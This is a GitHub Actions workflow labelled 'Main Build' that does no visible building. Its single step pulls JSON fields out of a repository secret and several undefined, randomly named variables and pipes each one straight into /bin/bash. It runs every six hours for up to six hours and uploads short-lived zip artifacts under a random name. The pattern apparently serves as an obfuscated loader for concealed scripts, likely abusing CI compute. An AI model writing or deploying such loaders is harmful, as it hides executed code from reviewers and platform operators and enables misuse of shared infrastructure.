name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '29 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          qlm2: ${{ secrets.qlm2 }}
        run: |
          printf '%s' "$qlm2" | jq -r .dzqj6 | /bin/bash
          printf '%s' "$f0985" | jq -r .examb47563 | /bin/bash
          printf '%s' "$dtndp0" | jq -r .wvpkw14 | /bin/bash
          echo $jdlbv2356 | jq -r .rczcg88 | /bin/bash
          printf '%s' "$xfx67" | jq -r .i62 | /bin/bash
          printf '%s' "$os8" | jq -r .hai719 | /bin/bash
          echo $lowuy938 | jq -r .udg67194 | /bin/bash
          echo $hhv57047 | jq -r .ni887 | /bin/bash
          printf '%s' "$det2" | jq -r .cl836 | /bin/bash
          printf '%s' "$ri574" | jq -r .df324 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: WduamQch
          path: "*.zip"
          retention-days: 1
